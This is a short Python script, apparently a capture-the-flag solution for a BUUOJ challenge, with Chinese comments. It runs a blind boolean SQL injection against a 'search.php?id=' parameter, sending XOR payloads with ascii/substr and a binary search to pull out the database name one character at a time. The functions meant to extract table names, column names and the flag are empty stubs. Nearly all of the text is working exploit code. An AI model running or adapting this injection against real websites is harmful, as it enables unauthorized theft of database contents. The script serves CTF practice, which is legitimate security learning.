# -*- coding:utf-8 -*-
#!/usr/bin python3
import requests

url = "http://5c4bcb3e-d2b1-48e0-be2a-3144cde20a97.node3.buuoj.cn/search.php?id="


def exploit_db_name():
    """爆破数据库名字"""
    res = []
    for i in range(1, 20):
        l, r, mid = 32, 127, (32 + 127) // 2
        while l < r:
            payload = f"1^((ascii(substr(database(),{i},1)))>({mid}))--%20"
            tmp_url = url + payload
            resp = requests.get(tmp_url)
            if "ERROR" in resp.text:
                # 这种情况为不正常回显 ascii-val > mid
                l = mid + 1
            else:
                # 这种情况为正常回显 ascii-val <= mid
                r = mid
            mid = (l + r) // 2
        res.append(chr(int(mid)))
    print(res)
    print("The database name is", "".join(res))
    return "".join(res)


def exploit_tb_name():
    """爆破表名字"""
    pass


def exploit_cl_name():
    """爆破列名字"""
    pass


def exploit_flag():
    """爆破flag值"""
    pass


if __name__ == "__main__":
    exploit_db_name()
